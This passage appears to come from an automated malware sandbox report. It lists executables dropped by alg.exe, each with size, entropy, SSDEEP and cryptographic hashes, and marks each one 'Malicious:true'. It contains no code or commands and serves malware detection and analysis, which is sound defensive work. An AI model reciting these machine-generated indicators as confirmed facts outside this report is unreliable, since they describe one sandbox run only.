                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1222656
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.702488998907658
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:jAdzN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:jAdBLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:8F56BE84E7061A4274D557B8BA21E64B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D2C3841CF045334C4265975B5080ED88A65BCC7F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3088116375CFEA0540BC4A9AB451D452D42BEEC237DAE8367BCB5A9C6C7F7368
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8A98B50616FBE77AD8761B74C38477E60B2AE6D4EE36F724570E8CDA677D71D0669376AF9A602831EE67DE1092536D9FD0AFDFBC240E9A45AAF2E1423044511C
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1613312
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.680227420123107
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:rvliJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:F/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:ABB24D17BEAA0A4CE3F95E25F00CF11B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5084A87240216B9C1EFF591A5E38C1F590F00061
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:DF587E637570AABF7856E451E87B0717881D2C958C6BECED0BC48BC2073082FF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:33C1866E451920BFCC6C4A38D5B94BF63406A2F0AD52BBD1362EE2799C9BE2C381D92219F7F12A8712806D6B58FED71E1A4203DA8FCC528BFA28638B646FE814
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1616896
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.046911902787726
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:R5zhM1XSck/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:NMsVLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:2F76BDC1E70B3832A2AC97F30914EEB3
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7DA1F18E4C73880DBBF7CEB4407EDD361ABB5CCA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CBAF8D9BAC7041645F5DDA67714B15FD92D82236EE23F64C2A900568D5B03E9D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A3261FFE7875E1BC33FEF699AE5B683160170E5A04099106CEB82C84042C66CABF5C743FAF514B03D2C8D9E86EF2A9898BEF3D18CE99E466D735158BB6EF9FA0
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.497783907481587
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:8tuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN7553LNiXico:8jEIa4HIEWOc5B7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:B609234EC835F5CF44B446EA6F9F2FBF
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D39B7B790D3824C4647133355607E052C97002AE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A886FE029A0C9891F29029436B9A134E13C8F73C91E3A1DD26BD27CFB44FF994
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0A22284E31E71043A3D1F203EFC10FFD601A96E43370D447B097E2030BA20AFDAA8541ADD31FA99FBFFAB95508E2E45C9B4B194F7181FCA6F65BCF329C7266D4
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.9993603686398425
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1572864:UQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:LXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                        MD5:FB306BA2FCE04A800F07F7C2A115AB78
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:99BDA4AF0A392D72D806593A9C741C90F9181F43
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EC85E3F5737D13DFE9070A000E7B24C37C2ED7BCF915E7275EC416143A4CE014
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D84C68EFD948067CE0FF3D773A494704AE3F0F48C833EC274D785B561DE3F21A97E412AA678BF55300BB65CC0402C0747F97045E2950231793901AD1F17FBDBF
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1335808
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.597035587160331
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:gWdiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:gs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:8074D98E5144007184CD67B766E1F61D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:77DCF8EAB1BE61441D68ED433DA86DD6242EC422
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A861980B957CA3B2A8C34D843950E3C9C3CAC02EA915A61F9EEF1F84B09BE357
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:4D71D44ADC2AB04F9A60A4A8D8B137D4A508DEECDC84B113790EA8B010045833B2A0F0309062EDC6388C403D776A31DEC1EBF182B5B82C8151C861138E74881A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):6210048
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.385275781417689
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:DDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXq:snN9KfxLk6GEQTX5UKzNDG7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D4CFAF37BC53FA040C33CF2FDD0B9ECA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DBB1E377CAC2FB46DE680D7D6B0F7FBD0736C556
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F36A9535B57057534E9BB1E53DF0694CFF6EA1F88F19D9F53DEA3E4776C94722
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:514611D2A6207D4181E3A787963101DF7E959CCA18A4111DA269119EF7BCDDDBE53298A41787D24043D0C23010376C8F72C788C4EDD96071E2ADFD4880C72908
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1312768
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.548400068242816
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:4aiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:48/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:528D29B13CE5050E170DA23F8F27DDC6
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:09E89797FBB64A28B57A349DF22C742D893A3ACA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D4284CB1C3F63895E3FC3290566AD9601142ABC85614BDC93FAD8AC773D21772
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F91448908BD7C0B458DD84578DE36ED49BC665F121262BA6596694DB969073AB9E4F58AE8DA9421B7E182C0EEDC39EFE9AC73770F73F359FB472BEEFB6CE087
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12039168
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.595975797983477
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:Rb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKn7wRGpj3:tnPgTHIwZoRBk9DdhSUEVIXgK7F9
                                                                                                                                                                                                                                                                                                                                                                                        MD5:17B24F35647E7FD417015C2802BF4801
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FE61D4F4A36998D3AFE17AB3941821F1F69FB2F3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CCA5D5D91D8744FFDCD03C848181547AB724DCB8D5222A132D87AD19CDAE6B2E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1039CCD19752C70F1CAF2479D7EFED1520CB7C74D204B30B0B043CE4AE520AB62D5389FCCC322D6A19ECA87BF1AFD3BA7CB773DD8AEE2557BF251A758A1F8324
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1478144
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.8298870322350105
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:4g5FvCPWs3/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:dfFALNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:78595D24AB8A78FDD3D7B4AF78A80DDD
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5DC083201D9B6AE4F0F871D29A66ABBE51F7EC76
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:657E73C3B14C809CD1F45C208B5DA8CA3F41BDB1B4CBEF9BECEE5E837AA7DB7E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6C32BF518C46E60F91A6AB577912E21F640597E59243E93F1A34D52698BCA874ECF9CEA7CEEB10AB7DAC549422337936B2ED7E8D44BFD5772040487F14CD9A6B
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.202750765814141
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:6jKTIsAjFuvtIfmFthMaT5U8aChaeuF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:6jIMmPh7TT79YLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:FA230D8D2F1F73EEBA270CBFBDDF977E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AB940CCF34F89D2E60412580BAA55201468A2304
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0A7CB73BCFAAD55B4ABB8B8411733284DE8F719B2243A595162053D4F7A6D536
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:FFB2741CB2D0ADF98E9C032F4F84A5AA6BB08F0AC79CE79512D5095C2C38F8295642BD5C8313E870B4AA03AF707E213543459325738026C067ED8C4FBF660290
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1671168
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.008260224588016
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:FGqVwCto1em5WgJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0Z1emU2LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:54A872BDD93F4C9F5544706B6E2FB44C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9361731802AA2D3C86526DCEB4A368D3944C3CFC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9D096BBC0E31E829EBE1DC0EE582187E91759F0417ABB4DB8F9BE538478DC1DF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:75BC58AE41C2285BCBD7999D9F65B59BBB7E9451625323951282F7FFBBBB41B9B2025317A122D0D3F056CDD03812CD78E98FDBBCC3330D624F55802C26B96D66
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1409024
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.690544707669362
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:bWBW0/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:50510CFC98DD5FD586154EA7BA39CEA7
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:ABE0C5CAA505782CD4333CD26B25824F88221D9A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B861607214592094D25B520F0E9A3ED19D61696ABEA38A06BBD44B5F8C76AA82
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:DF4D764100C1B94CF98C300CA933981FD8B6294BE8AEC704D53D6AF6E9CFAC37B7A0A098D5118F9822190385195F6EB921166B4A013B4ED37F6D62FEF032103A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.223541515885686
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:7+GtCi27mVTyT+a0iLNiXicJFFRGNzj3:qmd27p7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3F81575436F1D1392A69AE79BA995904
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F4A99C65FC4293079F6A5C1BC8BF8E299D083906
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EF56AAE0DA405C3049335D333412B9B1F1C05522178144EB575A8809A9B6F801
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0FC077416DA0D6ADDC939977A6CA8CBEFEDCC3C6FE06E81B7F1101A5D5B63AC957FE284A92086D4D310CA9AAAA2AA4218B31205CB37C032C5FB952EFB34217C9
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3110912
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.648201398679988
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:IU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYhLNiXicJFFRGNzj3:52NfHOIK5Ns6qR9b7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C27E558CF2DAA911394C71231104D703
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:06F707DB5FC3625445DB522B5852364EA6AA2A53
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6E6DDE1D703508AA48911FBAF5D0950E848ABC2CBCFA8B8057DABE440FEF1721
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8A307EA32C3CA76103D762FCAB5494F8CF8DFC0EC7B74592CAB23B3D491ED0DBC824CF42AF612F08648FF716CC6580E8F6C7F3F5AD62F4D7E5C863597AB270EB
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1743872
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.139931760852899
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:SkDWTUQcyd5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:SqKUqLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:A3A91680D8A8A553BABB682C01C906A1
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:891991A773A04BFF26169A5ED7BF2F3F9D042FA8
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0187A57C949615ACBC467D19025609611BF0D63FBB5814A12D14921C6F489BB2
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:825F445C50F7ED134B6E0AD8C170FB2BDFF4BB170AE6F295822C0ED775FB8FA4205083F95F0B3B3E038CBE77EDDFD2DA7B74BB13DC573AA454F38E1C145B3C4D
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1494016
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.9009993371195995
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:YI+qBy/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:9+1LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:9B7055E5F5D5F9FE3DB2B8633997557C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:A30A1F8BC9D8A20579B554CBF31DF41B75D1180D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:476584B64D9C2ACE148C81C49EA25827F92413155E60CB09EBF1486BFFAC15E7
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EDF361D857A2C0B7157079754AC55617B057A1AB9247257D478163F61B7FB67691F146D3C1DFBF3884C801139291A72BBA67987FF4449E4389E90B4B7E640659
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1298944
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.52580882589904
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:FiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:J/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:9DA143A7F1B03B8CE97D0A4BD378E417
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D9B7B759642B83E289DA5610BD7C103A3172DD88
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:BF29DBDEEF37E4B7386E7212B4F464D2BABAE1BB6E7B1F318DB04857C27DED94
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:100690D29871AAD5CBAAB7ED60C8AD592924F2267759845D31D3926996A88ED8868AF961103BCDF30E836CC306139F05F7681F91A55BB1BD8D26152E74CE8C57
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1317376
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.555405151327708
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:8EiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:f/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:A38CCBCB76982C1A811551F530DD3747
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3A5AF36D2B2BE0CA9C22D888F42EE79C943CFE34
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:AD97E01523AFB5C7A4000AB6F256AFDEC93066D932BEC99F4E74192CFBD216CF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:EAB9FD9EA9AA188DF0AEFA1CBD2F76857AFB676A4792857CC43F27955A1A26E88D9D2B46072F9587A9AD6201852CDAC08EC12634C34602E3514F98595A5FF80F
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.4977792338315545
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:AtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN7553LNiXico:AjEIa4HIEWOc5B7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:CB6E68F0022DE25C5E751444154B88A8
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FEE65260B36872F29955B95CB230AE43FD663618
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8D9C223855810CF13548BAA3A37B1900EABC20A4F0BB88EC4DFF5579F050B57B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D1BE3AECB32C8F3178D5611B36DCBA6A64BEA7A80FEA39B7D999B1FB75424ECB2E6F47C8345650EE6DBBF359D8AA5145680F5F41B7F0A1CA6E4CD6485B0B7C59
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999360372030658
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1385984
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.7088011283767
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1540608
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.938624444362474
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1804800
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.250429797879778
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5365760
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.448974740068734
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3163136
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.971961764807433
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
